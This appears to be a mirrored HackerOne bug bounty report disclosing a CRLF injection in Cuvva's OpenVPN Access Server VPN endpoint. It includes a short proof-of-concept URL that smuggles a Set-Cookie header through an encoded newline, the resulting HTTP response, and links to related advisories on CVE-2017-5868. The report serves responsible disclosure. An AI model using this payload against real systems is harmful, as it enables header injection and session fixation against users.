Lucene search
CyriacH1:231508HistoryMay 24, 2017 - 6:16 p.m.
Cuvva: CRLF Injection [vpn.corp.cuvva.com]
2017-05-2418:16:45
cyriac
hackerone.com
136
0.003 Low
EPSS
Percentile
70.8%
Hi team,
Found a CRLF injection in vpn.corp.cuvva.com
Poc
https://vpn.corp.cuvva.com/__session_start__/%0aSet-Cookie:NEW_COOKIE123
Response:
HTTP/1.1 302 Found
Date: Wed, 24 May 2017 18:13:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://vpn.corp.cuvva.com/
Set-Cookie:NEW_COOKIES
Server: OpenVPN-AS
Content-Length: 59
<html>
<body>
<p>REDIRECT</p>
</body>
</html>
{F187794}
Related
prion
prion
Crlf injection
2017-05-26 01:29:00
packetstorm
packetstorm
OpenVPN Access Server 2.1.4 CRLF Injection
2017-05-27 00:00:00
nvd
nvd
CVE-2017-5868
2017-05-26 01:29:00
cve
cve
CVE-2017-5868
2017-05-26 01:29:00
hackerone
hackerone
Ubiquiti Inc.: CRLF Injection on openvpn.svc.ubnt.com
2017-05-26 22:41:44
seebug
seebug
OpenVPN Access Server : CRLF injection with Session fixation(CVE-2017-5868)
2017-05-27 00:00:00
cvelist
cvelist
CVE-2017-5868
2017-05-25 19:00:00